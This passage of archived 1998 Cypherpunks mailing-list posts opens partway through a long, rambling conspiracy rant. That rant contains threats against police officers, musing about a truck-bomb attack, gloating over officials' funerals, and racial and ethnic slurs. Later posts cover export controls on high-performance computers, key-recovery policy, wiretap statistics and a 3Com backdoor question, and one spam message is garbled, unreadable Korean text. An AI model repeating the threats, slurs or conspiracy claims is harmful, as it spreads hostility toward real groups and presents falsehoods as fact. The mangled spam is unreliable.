'watch' what is happening around you in your MeatSpace environment, is 
that, no matter how comforting the platitudes and 'wise sayings' that 
society-at-large attempts to program into your subconsious, A Day 
Without Freedom Is Like...Slavery.
  If you do not understand what I am attempting to explain by the above, 
then it must be because I am a drug-dealing, terrorist pedophile.


Diplomacy Is Saying "Nice Doggy!"...Until You Find A Rock:

  At the end of a song titled, "I've Been Up So Long, I Can't Get Down," 
on C.J. Parker's "Please! Stop Me Before I Sing Again" album, the 
extremely paraniod singer-songwriter says, "When you can't see THEM, you 
know THEY're being sly..."
  Since the confiscation of my computers, I have not seen a single, 
solitary police car during any of my trips to town. Today, however, 
after threatening the lives of every police officer upon the face of the 
earth during a conversation with my father over my 'telleveryonephone', 
I drove to town and could go nowhere without seeing 
armed police officers glaring at me from the safety of their officially 
marked vehicles.
  The dumb bastards haven't figured out that if they want to shut me up, 
they're going to have to use 'the rock'.


Change Is Inevitable...Except From A Vending Machine:

  When Micro$not was the only game in town, calling their customer 
support numbers resulted only in a recorded message saying, "When is the 
last time a vending machine gave you back your money when you banged on 
it? Fuck Off!"
  Once Pepsi has signed an exclusive contract with your local 
high-school, your children will be subject to felony criminal charges if 
they bang on a vending machine that has stolen their money.


Back Up My Hard Drive? How Do I Put It In Reverse?:

  "Never look back...something might be gaining on you."
~ That Nigger Who Could Strike Out Batters While Pitching From Second 
Base

  Satchel Paige! That's his name...
  He could strike me out in the batter's box at Yankee Stadium while 
pitching from second base at CommuninSki Park.

  I have grown used to losing the MeatSpace records of my life, loves 
and perceptive realities every time that I get mugged by desperate 
criminals or by self-righteous law enforcement agents enforcing what 
they imagine to be the laws that Hitler would put in place if he hadn't 
had to flee to the AdamAntArctic in order to have his body frozen until 
such time that the Nazi scientists welcomed with open arms by the CIA 
after World War II could perfect the CryptOgenics technologies that have 
their roots in the SuperMan Not Wearing Tights theologies of Nazi 
Germany.
 
  I don't look back...
  When Canadian Customs and the RCMP steal the digital record of my 
life, loves and perceptive realities, I look 'forward' to their 
funerals, in the Time-Space Continuum in which SPACE ALIENS HIDE MY 
DRUGS so that the murderous slaughter of everyone who has ever crossed 
my path can be justified as a valid Weight Loss Program which allows one 
to eat anything they want, as long as they burn off the calories in a 
murderous frenzy.


I Just Got Lost In Thought...It Was Unfamiliar Territory:

  ...uuhhh......never mind...


Seen It All, Done It All...Can't Remeber Most Of It:

  Space Aliens Hide My Drugs!


Those Who Live By The Sword Get Shot By Those Who Don't::

  Grass-roots activism and $ .50 will get you a cup of coffee in a 
greasy spoon.
  Canadians who peacefully protest against murderous dictators coming to 
Canada to participate in an Economic Summit will learn that "Money Rubs 
Pepper Spray In Your Eyes And Bullshit Rules!" [WAS: "Money Talks And 
Bullshit Walks!"]


I Feel Like I'm Diagonally Parked In A Parallel Universe:

  I bet if I used a truck-bomb to destroy an enclave of grunt-workers 
involved in the murder of men, women and children who hold uncoventional 
religious views, I would be called a monster for individually emulating 
the actions of the collective.


You Have A Right To Remain Silent! Anything You Say Will Be Misquoted, 
And Then Used Against You:

   The proper quotation of your statements will be released to the 
public after having been sealed under the guise of National Security for 
50 years, at which time it will have little chance of counterbalancing a 
half a century of FUD programming the masses to believe that [Your Name 
Here] acted alone, using a Magic Bullet that officially refutes the laws 
of Newtonian Physics, but which is unlikely to result in your being 
awarded a Nobel Prize.


Nothing Is Foolproof To A Sufficiently Talented Fool:

  This Basic Truth (TM) is the foundation to all amendments to the US 
Constitution, all interpretations of the Holy Word of [Your (G)(g)od's 
Name Here], decisions made by a hand-picked jury of the judge and the 
prosecutor's peers, and really good bar-pick-up lines delivered while 
rubbing one's private parts and drooling.


All My Lies Are True...And Everything I Do, I Really Am:

  "Ask not who your country can Nuke for you...ask who you can Nuke for 
your country."
~ Timothy C. McKennedy, President of Samsonite Peripherals, Inc.

  While the Mayonnaise Mountain Man keeps himself busy attempting to 
limit the ultimate effect of the digital emissions he fires toward the 
InterNet--which ricochet into the minds of innocent bystanders--by 
ranting against the ludicrousness of engaging in 'Magical Thinking', 
some of those taking a direct hit to the head by his XXX Magnum 
Diatribes Against Established Lunacy manage to catch the HeavyLoad 
BulletIns with their teeth, and spit them out in a parallel dimension 
where a lighter atmosphere allows the citizens to wear lighter loafers 
with crystals where the pennies should be, and propel the conceptual 
spirit of the electronic missives of An Aider And Abettor Of A Terrorist 
Nuclear Strike To Be Named Later through electronic goalposts which are 
far-distant from MileHigh Electronic Stadium.

  Thus it is that Circle of Eunuchs Initiates, FrostBack Division, can 
use a John Candy movie to implant in the minds of the Sheeple the 
subliminal suggestion that they can take a personal hand in writing the 
history of Biosemiotic Evolution within the boundaries of the segment of 
the Time-Space Continuum they inhabit, and get to fuck the living shit 
out of Gena Davis.
  Thus it is that Circle of Eunuchs Initiate, Army of Dog Gorrilla, Son 
of MicroGomez can confidently proclaim Peter Jennings to be a Circle of 
Eunuchs Initiate, FrostBack Division, and not be in the least surprised 
when 'Epilogue 7.3 Rev. 1.7' of 'SPACE ALIENS HIDE MY DRUGS' rails 
mightily against the hypocritical ludicrousness of those sworn to 
'Protect and Serve' the citizenry responding to the actions of a single 
dangerous driver by adding a dozen LEA dangerous drivers to the 
equation, and less than a week later Peter Jennings, made manifest as a 
Circle of Eunuchs Initiate by the simple act of declaring it to be so, 
slams an exclaimation mark down to provide an addendum to 'Epilogue 7.3 
Rev. 1.7' by inserting a piece into 'Word News Tonight' which pointed 
out that:
  ~ One-third of those who die in high-speed police chases are 'innocent 
bystanders'.
 ~ 1,000 people a year die in high-speed police chases in California.
 ~ 5,300 people died last year in high-speed police chases in America.
 ~ State laws make it virtually impossible to sue LEAs in order to force
    them to face the consequences of their decisions and actions in the 
same
    manner that is required of other citizens in 'criminal' as well as 
in 'civil'
    court.


The Truth, The Whole Truth, And Nothing But The Truth:

  During the WaterGate debacle, I was listening to a Saskatoon radio 
station on which a 'political expert' from Washington, DC, give his 
opinion of the moral and legal issues surrounding the affair and the 
role which President Nixon played in it. During the call-in 
question/opinion period, I phoned the radio station and proffered the 
opinion that, "If Nixon knew about the affair, then he is a criminal, 
and if he *didn't* know about the affair, then he is incompetent, given 
the fact that the crimes were committed by those in power as a direct 
result of his administrative decisions and choices."
  A few days later I was listening to a mainstream media news broadcast 
in which the news anchor announced that the 'current view' of 
'Washington insiders' was that Nixon was either incompetent, or a 
criminal. The wording made it plain that the 'current view' of 
'Washington insiders' was the direct result of an inastute political 
neophyte from ButtFuck, NoWhere, inadvertantly stumbling upon a Basic 
Truth (TM) which was relevant to the situation--namely, "The Buck Stops 
Here!"
  Not..."The Devil made me do it!"
  Not..."I was betrayed/tricked by those I trusted!"
  Not..."It was the result of the Messages From Mars that I received 
through 
             the fillings in my teeth..."

  "The Buck Stops Here!"
  I knew that, you knew that, and everyone ensconced in the Halls of 
Power who were involved in putting a particular politically-motivated 
spin on the WaterGate affair knew that. Nobody holding a well-paying 
job, with medical and dental benefits, wanted to rock the boat and risk 
changing 'the way things are'. Nobody satisfied with the level of 
welfare benefits they were receiving wanted to rock the boat and risk 
changing 'the way things are'. There were few who refrained from 
recognizing and stating the obvious out of ignorance--most of us/them 
did so as a result of being 'bought off' by our current position in life 
nudging us toward accepting THE LIE in order not to put our established 
and manageable world-view at risk of tumbling down around us as the 
result of a violent assault by THE TRUTH.
  The comfort and safety of a world-view paridigm which was willing to 
accept mutually agreed-upon lies, in order to prevent the boat being 
rocked and subject to swamping, was ripped apart by the voice of a 
TruthMonger, Deep Throat Division, crying in the wilderness, to those 
who had 'ears to hear'.

  My sister was predestined to move to NewAge, California, take a Sufi 
name, purchase a mountain of crystals and become a feminist, 
anti-nuclear, yogurt-eating guru dedicated to the promotion of 
color-therapy as the answer to all of humankind's ills.
  The only reason that Charles Manson chose to have his followers 
slaughter Sharon Tate's Baby, instead of my sister, was because she was 
honest enough to admit, during the height of the Vietnam War Craze, that 
the young men of America were being sent to their deaths in order for 
her to enjoy the benefits of refridgeration which were denied to the 
peasants in Third World countries.
  "G.I. Joe died for Standard Oil's sins..."
  ~ A Communist Sympathizer To Be Named Later

  "The King has no clothes!"
  This is the message of the InterNet...

  "KNixon Knew!"
  This is the message of the InterNet...

  "A thousand points of light, censored by the New World Order!"
  This is the message of the InterNet...

  "If the dangerous, high-speed police chase is being video-taped from a 
helicopter following every move of the 'escaping' vehicle, then why is 
it necessary for the police cars to use flashing lights, sirens and the 
threat of armed violence to exacerbate and add to the bad judgments 
being exhibited by someone who has little or no chance of eluding "Three 
air-units." (Verbatim quote from 'World's Scariest Police Chases' which 
is sexually exciting me, even as we speak.)"
  This is the message of the InterNet...

  When is the last time the subject of government regulation came up in 
a business meeting and, when your opinion was solicited, you stated, "We 
have reached a point where it is morally acceptable to kill the 
bastards, but it is not yet feasible to do so."?
  When is the last time you passed this gem of wisdom from Vin 
Suprynowicz (Vin ThePolishKike to Zen Racists) along to fellow Netizens 
who did not hold the power to immediately affect your life for better or 
 worse by deciding whether or not you would continue to receive a 
paycheck?
  This is the message of the InterNet...

  My WebSite was murdered by Sympatico without warning or explaination, 
as a result of Armed Thugs I had offended violating my inherent right to 
speak the Truth as I perceive it. My computers and those of my relatives 
were confiscated without any warning or explaination, as a result of 
Armed Thugs violating my right to speak the Truth as I perceive it.
  The 'Official RCMP Hate Page' now resides in a hidden file on dozens 
of Canadian government computers, thanks to the efforts of a CypherPunks 
list member who is willing to defend my right to free speech regardless 
of the fact that he has contracted a hit-man to murder me for forging 
posts to the list in his name which made him look like a fucking idiot.
   This is the message of the InterNet...


The Truth, The Half-Truth, And Nothing Remotely Resembling The Truth:

  'The Amazing Randi' (?) is a magician who has gone to great effort to 
expose Uri Geller and debunk his claims of using psychic powers to 
accomplish what magicians can replicate through sleight-of-hand.
  Did 'The Babe' *call* his legendary home-run shot by pointing to the 
location he was planning to bury it, or was it a 'lucky' stretch of his 
muscles before stepping into the batter's box?

  I would be the first to admit that a strong case could be made for 
viewing the 'hard evidence' I point to as proof of the validity of my 
rambling, insane conspiracy theories, as being the result of the 
selective presentation of Reality-Bytes filtered through sieves designed 
to present 'chaff' as a real substance not dependent on the existence of 
an imaginary 'wheat' substance whose existence is promoted by 
underground Reptilian
Nazis hell-bent on world domination.
  I would also be the first to admit that 'coincidence' could account 
for Peter Jennings seemingly fullfilling in MeatSpace his 
Virtually-Assigned role as a Circle of Eunuchs Initiate member by 
providing the hard facts and figures substantiating the views espoused 
by 'Epilogue 7.3 Rev. 1.7' of 'SPACE ALIENS HIDE MY DRUGS!!!'
Not to mention the fact that 'coincidence' could explain the fact that a 
single reference to 'Thelma & Louise' at the end of the same Epilogue 
was followed by references to the movie in dozens of disparate TV shows 
over the next few days (including an episode of '48 Hours' which showed 
excerpts from 'Thelma & Louise" as I was typing this very paragraph...).

  The fact of the matter is, however, that a lifetime of separating 
'coincidence' from 'synchronicity'--through a process of objective 
evaluation of mathematical probability--has led me to believe that this: 
|<----------->| : is 8", in a parallel universe within which women have 
not yet been given the right to vote.
  Likewise, it is ludicrous to live in a universe in which it is a 
recognized scientific fact that the emissions of a cellular phone can 
affect a radio telescope a hundred kilometers distant, while disallowing 
the possibility that the emissions of a human mind, heart or spirit can 
register on a similarly designed biotechnological receptor in local or 
global proximity to the source of the emissions.
  It is equally ludicrous to fail to recognize that physically 
manifested and disseminated symbols representing the results of human 
thoughts, emotions and concepts will have an effect that is every bit as 
observable and predictable as laws of physics concerning inertia, 
impetus, velocity, acceleration and direction, etc.

  If a decade of scientific investigation into the mechanisms by which 
pigeons find their way home proves to be inconclusive, the pigeons will 
still manage to find their way home. If humans find themselves incapable 
of returning to the place they were born without having a 
birth-certificate and a roadmap, salmon are unlikely to abandon their 
natural ability to do so by virtue of a process which could be viewed as 
'Magical Thinking' by those incapable of reducing the process to a 
solveable MeatSpace equation.
  NewAge 'Magical Thinking' is nothing more nor less than an esoteric 
extension of 'The Power of Positive Thinking' paridigm which is the 
foundation of all subsequent self-help, goal-oriented individual 
accomplishment and corporate management systems which recognize that an 
inspirational thought that results in a single step toward Mecca is more 
effective than a thousand corporate meetings discussing the feasibility 
or futility of putting a journey to Mecca on the agenda of the next 
shareholder's meeting.


How To Get Even Without Breaking The Law / Sweet Revenge:

  I have been fucked a thousand times by the arbitrary, capricious 
decisions and actions of a variety of officially recognized 
Authoritarian Sivil Servants who didn't like my looks, my attitude, or 
my breath. I have also avoided being fucked several thousand times by 
'shaping' my answers to their questions in a manner designed to 
misdirect their peckers as they tried to stick them in my butt.
  When the Canadian Customs & Immigration shit hit the fan, and I was 
forced to appear before an official Board of Inquiry convened to decide 
whether or not I could be denied entry into the country of my youth, I 
found myself forced to abandon all logic and reason, and trust in th Tao 
to protect me as I resorted to telling the <gulp><swallow> Truth (TM).

  In the face of damning evidence of my slick, conniving manipulation of 
rules, regulations and laws through the use of Damnable Lies!!!, I 
explained my theory of Variable Speed
Truth (TM) to the Board of Inquiry (although I attributed it to Albert 
Einstein, in order to give it more credibility).
  I explained that, as a Border Child, I had grown up in an environment 
which enabled me to understand that 'Rules Is Rules...' is an extremely 
flexible maxim which can be interpreted by an individual Canadian 
Customs & Immigration OffalSir to mean that, even though you have been 
dating his daughter for several years and have been invited over to 
dinner numerous times, that he can legally deny you entry into the 
country and make you drive fifty miles to enter through another Customs 
Port if you fail to have three hundred and forty-two pieces of picture 
ID, particularly if you kept his daughter out past curfew the previous 
weekend.
  I also explained a variety of situations in which I had crossed the 
US/Canadian border more than once on the same day, and claimed residence 
in different countries, because I knew what each border guard wanted to 
hear in order to make my passage proceed more smoothly, as opposed to 
making my life a living hell for no apparent reason other than their own 
misunderstanding of the laws of the country.
    Although I would be the last to downplay the successful result of my 
appeal as being partly the result of the members of the Board of Inquiry 
being decent people who had retained a small part of their soul while 
serving the Great Beast, I fully recognize that the outcome might have 
been completely different if I had failed to properly play my part in 
the Grand Play by hanging my head in shame as my extremely expensive 
legal counsel pointed out to the Board of Inquiry what a sorry, pathetic 
loser I was, and how the only real options in this case would be to 
forgive my trespasses, or take me to the pound and have me put down like 
the poor, sick, mangy dog that I am.

  My point is that, regardless of the letter or spirit of the existing 
laws, it is up to each individual to interpret them in a manner 
consistent with their own best judgement, and to live with the 
consequences of what they truly believe to be 'right action', no matter 
what judgements or punishments may result from people with larger 
weaponry taking the opposite view.
  Of course, I would be foolish to pass judgement upon those who 
recognize the wisdom in grovelling, snivelling, and hanging one's head 
in shame, if it appears to be the path that will allow one to live to 
fight again another day...kind of like faking a limp on the way back to 
the huddle, in order to break for the Big Score.


An Exercise For The Reader:

  I can no longer remember just where this rambling, semi-coherent 
missive was evenutally designed to end up, but I think it has something 
to do with the fact that my unsubtly veiled threats against those with 
False Smiles (TM) has resulted in the glue-sniffing progeny of A 
Wagon-Burner Named Earlier having had the flimsyl, fabricated assault on 
his Charter Rights abandoned by the dropping of all trumped-up charges 
against him.
  However, this has come at the expense of my being called down to local 
Gestapo Headquarters to receive paperwork indicating that I can expect 
to go to eventually go to prison for at least four years as a result of 
Baby's transgression of the 'Dog At Large' bylaws of the Town of 
Bienfait, Saskatchewan.
  Silly me...my drunken, drug-induced paranoia would have me believe 
that much of my current troubles stem from the fact that I am in the 
midst of preparing a legal defense for a Wagon-Burner whose continuing 
persecution by Dudley DoWrong and John Law was one of the subjects 
addressed in "The Official RCMP Hate Page" chapter of 'SPACE ALIENS HIDE 
MY DRUGS!!!', and who is being persecuted by the same Queen's Court 
Bench prosecutor whose ass I used to wipe the floors of the Halls of 
InJustice and then bragged about it to (G)(g)od And Everybody in a 
public forum on the InterNet.

  Anyway, figure out just what point I am trying to make here, consider 
it made, and hit the <Delete> key at your own convenience...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Fri, 8 May 1998 18:45:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: I Can't Help Myself...
Message-ID: <3553ADE2.66AB@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


!OB Crypto:

  I crossed the US border today to make a beer run, and a US Customs
officer who has known me for decades took the time and trouble to
'roust' me, as per the instructions of his superiors.
  The last words out of his mouth were a question to which he has long
known the answer: "Where were you born?"

  I was born in Liberal, Kansas.

  Could it possibly be that this fairly decent individual, who has
never done me serious dirt, even when it would have resulted in 
career advancement, is a Secret SypherPunk delivering a cryptic message
that could be translated as, "Toto...I don't think you're in Kansas,
anymore."?

DrunkOnCheapAmericanBeerMindsWantToKnowMonger






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Fri, 8 May 1998 18:45:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Refutation of 'Magical Thinking'
Message-ID: <3553B268.77FA@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


I decided to do an objective experiment to prove or disprove the 
validity of 'Magical Thinking'.
I shut my eyes and concentrated on psychically willing my TV to provide
me with an indisputably meaningful message relevant to my life.

I turned on the TV, to a random channel, just in time to see/hear 
Dorothy and the ScareCrow singing, "If I Only Had A Brain."

Conclusion: Magical Thinking is BullShit!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 8 May 1998 16:44:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: HPC Report
Message-ID: <199805082344.TAA21658@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Commerce and Defense released Monday a study of 
high performance computers, national security and export
controls which we have transcribed:

   http://jya.com/hpc/hpc.htm  (Contents, execsumm and Chap 1)

The 221-page report provides a detailed survey of HPC 
applications for national security work with recommendations 
for export controls in the light of advances in distributed
and parallel applications. There's are thumbnails of 200 
projects with indexes of power -- with a glance at crypto 
futures.

For brute power the ASCI Red ++ appears to be the 
leader -- and off the chart of customary measurement.

The full report is 1.6MB, and a zipped version is available:

   http://jya.com/hpc/hpc.zip  (1.0MB)


-----

Here's the report's press release:

U. S. Department of Commerce Bureau of Export Administration
May 4, 1998  

Advances in Computer Technology Make Export Controls More Difficult

Washington, D.C. -- Commerce Assistant Secretary Roger Majak and Dave 
Tarbell, director of the Defense Technology Security Administration 
at the Defense Department announced the release of a long-awaited study, 
"High-performance Computing, National Security Applications, and Export 
Control Policy at the Close of the 20th Century," by Dr. Seymour E. 
Goodman, Dr. Peter Wolcott and Dr. Patrick Homer. 

The study has been prepared as part of President Clinton's decision in 
1993 to periodically assess U.S. computer export controls. Today's study 
provides an important contribution to the government's understanding of 
technology trends in the computer industry and national security uses for 
high performance computers.

The study finds that technology is evolving at an astounding rate in the 
HPC industry, rapidly increasing the performance of computers at all levels. 
Key findings include: 1) advancements in microprocessor performance which 
have brought down the costs of HPCs and reduced their size; 2) improvements 
in interconnect devices which have permitted a greater range of products to 
enter the market and helped to make high-performance power more accessible 
and affordable; 3) more open system architectures that contribute to enhanced 
calability; and 4) the ability to network the computing power of smaller 
systems to find solutions to large computational problems.

All of these advancements create challenges for export controls on HPCs. In 
particular, there is growing availability of ever more powerful computers in 
the world marketplace. The market for HPCs is flourishing worldwide with many 
new and used systems for sale through mail order and third party distribution 
systems. The study points out that determining what computing levels can be 
controlled depends on factors such as dependence on vendor support, the 
growing diversity of computer architectures and the scalability of computer 
systems.

An earlier study published by Dr. Goodman and his associates issued in 1995 
predicted that computers with speeds of over 2,000 MTOPS would be widely 
vailable in commercial markets by 1997. Those predictions have proved
correct. 
This new study will be an important reference point for the Administration's 
continuing review of computer controls.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Fri, 8 May 1998 20:55:42 -0700 (PDT)
To: "Trei, Peter" <ptrei@securitydynamics.com>
Subject: Re: DoD orders vendors to use Key "Recovery"
In-Reply-To: <6B5344C210C7D011835C0000F8012766017A75E6@exna01.securitydynamics.com>
Message-ID: <3.0.5.32.19980508204952.040f2d70@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain


At 03:05 PM 5/8/98 -0400, Trei, Peter wrote:
>
>
>I hope someone sends them the NSA report on the security hazards of
>KR. 

I think that people should sell the Government crypto software with key
recovery.  We need to have a backdoor into the government's communications.

Any key recovery system sold to the governemtn should have a real obvious
and visible key recovery system so they know that it is there.


>
>Peter Trei
>ptrei@securitydynamics.com
>
>---------------
>http://www.gcn.com/gcn/1998/May4/cov1.htm
>
>GCN May 4, 1998 
>
>Defense wants PKI now 
>Department intends to make vendors use strong encryption 
>By Christopher J. Dorobek 
>
>To jump-start development of a public-key recovery system, the Defense
>Department plans to require its vendors to use strong encryption,
>deputy Defense secretary John Hamre said recently.
>
>Because it wields significant buying clout, Defense's more stringent
>requirements should boost government and industry efforts to build
>systems for managing encryption keys, Hamre said last month at an
>Armed Forces Communications and Electronics Association event in
>Washington.
>
>Agencies cannot wait for the government and industry to settle on a
>national encryption policy, Hamre said.
>
>Through successive administrations, the government has tried to
>develop a singular policy on encryption. But so far, the efforts have
>failed.  Generally, industry has criticized the government's policy
>proposals as too restrictive.
>
>"We have an important national imperative to protect ourselves in this
>world," Hamre said. "We can't wait to have this issue resolved ...
>therefore we're going to buy encryption with key recovery."
>
>Vendors will have to use encrypted data and be able to recover it when
>doing business with DOD, he said.
>
>Defense will work out a final policy in the coming weeks, Hamre said.
>
>[...]
>
---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: postmaster@mail.opentown.com
Date: Fri, 8 May 1998 21:28:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Opentown proudly announces 50,000 membership Anniversary Giveaway Festival
Message-ID: <199805090428.VAA24848@toad.com>
MIME-Version: 1.0
Content-Type: text/plain

50000ȸ ı " !



http://www.opentown.com



Ÿ (c) " 3/4 5 ȸ" ġϿ1/2ϴ.

1/4 (c)* 1/4  Ǫ ǰ Բ 3 ""縦 *Ͽ1/2ϴ

.





"Ⱓ : 98.5.7 ~ 6.5 (30ϰ)



 " 1.  1/4 " 

1/41/4迡1/4 Ѱ" Ư 1/21/2*Ը1/2(r)" 1/2ø 30ϰ   ְ

1/4 3/4 " 1,000 

"޶, PCS޴, MGM(r) "Ĩ 1/4(r), Ÿ "

, Ÿ " ǰ" 

"  մϴ.

     

 " 2. ִ ȸ õ " 

"Ⱓ 3/4 1/2ű ȸ" ִ*   1/2Ų ȸ 5  PCS޴

13/4"  մϴ.



 " 3.  5,000° 1/2ű԰  ȸ   

1/2ű  1/2 ȸ  5,000° ȸ Դ  PCS޴ 13/4"

մϴ. 



"" 3/4 "ӵ "** 1/41/4.

귿, ο", , ", 1/21/2*Ը1/2(r), 1/2 1/41/2߿ 



"1/2۰ 3/4 , Ű, "(r)3/4", Ȧ" ߰* 1/41/2˴ϴ

.



Ÿ Ư ڹäõ غ3/4 1/2ϴ.  "ٸ ä ̸

1/41/4.





Good Luck!








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Fri, 8 May 1998 21:30:24 -0700 (PDT)
To: Toto <toto@sk.sympatico.ca>
Subject: Re: Dialogue - SPACE ALIENS HIDE MY DRUGS!!!
In-Reply-To: <3553A2E3.2E06@sk.sympatico.ca>
Message-ID: <3554061D.E500FC22@acm.org>
MIME-Version: 1.0
Content-Type: text/plain


Would have been ROFLMAO if it weren't so true.

Toto wrote:
>You Have A Right To Remain Silent! Anything You Say Will Be Misquoted, 
>And Then Used Against You:




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 May 1998 17:57:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Dialogue ------ Space Aliens Hide My Drugs!
Message-ID: <199805090057.CAA15826@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


ROTFLMAO!

  "Ask not who your country can Nuke for you...ask who you can Nuke for
your country."
~ Timothy C. McKennedy, President of Samsonite Peripherals, Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 9 May 1998 14:45:32 -0700 (PDT)
To: Sunder <sunder@brainlink.com>
Subject: Re: [Fwd: 3Com switches - undocumented access level.]
In-Reply-To: <355372B4.C837F915@brainlink.com>
Message-ID: <Pine.BSF.3.91.980509032901.17424A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Since you didn't specify the method of access. it is hard to determine if
this is a large security hole. Most equipment can be rebooted and brought
up without a password IF you have local access. For example, Cisco routers
can be brought up without password simply by specifying the starting
address of the load file, but you have to be at the local console to do
this. 

UNIX systems can be brought up w/o password in single-user mode, if you 
have local access. Yes, there are firmware passwords to guard against 
this on many systems, but one can always swap up the eeprom, etc.

I'd only be worried about the 3Com backdoor if it can be used remotely.
Got any details?

-r.w.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McQueeney <jajom@lava.net>
Date: Sat, 9 May 1998 11:58:21 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: 1997 Wiretap Report
In-Reply-To: <199805091831.OAA29612@camel14.mindspring.com>
Message-ID: <3554A738.F7C3B5A2@lava.net>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
> 
> The US Courts 1997 Wiretap Report is out:
> 
>    http://jya.com/wiretap97.htm
> 
> Total: 1,094, up 59 from 1996; 206 "electronic."
> 
> 374 taps in this nabe; dozens in this bldg, six in
> this flat, a couple on this box, one under lip
> counting morse teethgrinds.
>


Those reported are *only* the aauthorized wiretaps; I wonder,
how many unauthorized wiretaps were made?  I guess we'll
never know... 


-- 
Jim McQueeney <jajom@lava.net> ICQ: http://wwp.mirabilis.com/719836 
***************   PGP Keys on public key servers:   ***************
RSA 1024/0x45A3FB5D FP/9AEF4C97 E35437D6 434CF20C 6D4D075E  *******
D/H 1024/0xA82248FD FP/F77BC061 45BF05EF FFB7AC2B C7F07C21 A82248FD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Sat, 9 May 1998 09:47:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: HPC Report
In-Reply-To: <199805082344.TAA21658@camel7.mindspring.com>
Message-ID: <v03110706b17a3f741ba2@[207.94.249.173]>
MIME-Version: 1.0
Content-Type: text/plain


If the export control people are worried about people designing nuclear
weapons, it should be noted that the US managed to design weapons with
computers like the CDC 6600 and 7600 that make today's PCs look fast.
Today's PCs have more memory and bigger, faster disks too.


-------------------------------------------------------------------------
Bill Frantz       | If hate must be my prison  | Periwinkle -- Consulting
(408)356-8506     | lock, then love must be    | 16345 Englewood Ave.
frantz@netcom.com | the key.     - Phil Ochs   | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Sat, 9 May 1998 09:46:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: U.S. Navy caught hacking into British marine charity Web site
In-Reply-To: <355450B4.28BA4217@whitehouse.gov>
Message-ID: <v03110708b17a425fcb2e@[207.94.249.173]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:48 AM -0800 5/9/98, Spam the President wrote:
>http://www.infoworld.com/cgi-bin/displayStory.pl?98058.winavy.htm
>
>  U.S. Navy caught hacking
>  into British marine
>  charity Web site
>
>  By Kristi Essick
>  InfoWorld Electric
>
>  Posted at 3:07 PM PT, May 8, 1998
>  ...
>
>  "I think whoever it was within the U.S. Navy
>  facility would have better things to do rather than
>  try and hack into our computers," said Chris
>  Stroud, the organization's director of campaigns,
>  in a statement. "If they were seeking reports on
>  the Black Sea, we shall be freely publishing these
>  in the near future anyway."

Consider the possibility that someone hacked into the Navy's computer and
then used it as a base to hack the Marine Mammal Charity site.


-------------------------------------------------------------------------
Bill Frantz       | If hate must be my prison  | Periwinkle -- Consulting
(408)356-8506     | lock, then love must be    | 16345 Englewood Ave.
frantz@netcom.com | the key.     - Phil Ochs   | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 9 May 1998 07:25:08 -0700 (PDT)
To: Digital Bearer Settlement List <cypherpunks@toad.com
Subject: db$: Digital Bearer Settlement Conference Status Report
Message-ID: <v04003a00b179ed67e9e3@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain


I suppose all of you have figured out by now what we're not doing a Digital
Bearer Settlement Business Development Conference at Bretton Woods this
August. :-).

I was willing to give it a shot, even with the admittedly high cost in
hotel rooms, if I could get presenters on the topics I wanted. If I got the
presenters, I could use the content to leverage the keynote speakers, and,
with those, I think I would have gotten the attendance.  Unfortunately, I
couldn't find anyone, with exactly two exceptions, who both knew enough on
the topics I was soliciting and who had the time to come to Bretton Woods.

In the process of figuring out all that out, however, something entirely
different presented itself, and thinking about *that* gave me another set
of conference ideas, which I want to bounce off you guys in just a bit. I
suppose don't really give up on ideas once I get them, though they may get
pushed down on the stack for a while. It's that Frisian expression of the
berserker gene thing, I guess... :-).


So, I was figuring out how I could sweeten the pot for presenters for the
Bretton Woods thing, when I bumped into the editor of a well-known book
:-). This got me to thinking about a book on digital bearer settlement,
containing the contents of this summer's proposed conference, written in
chapters by the presenters of the conference. I talked to the editor about
this, and she said that she didn't like books written by a cast of
thousands, and since we were talking about new technology with no user base
and she was a technical and professional books editor, she was going to
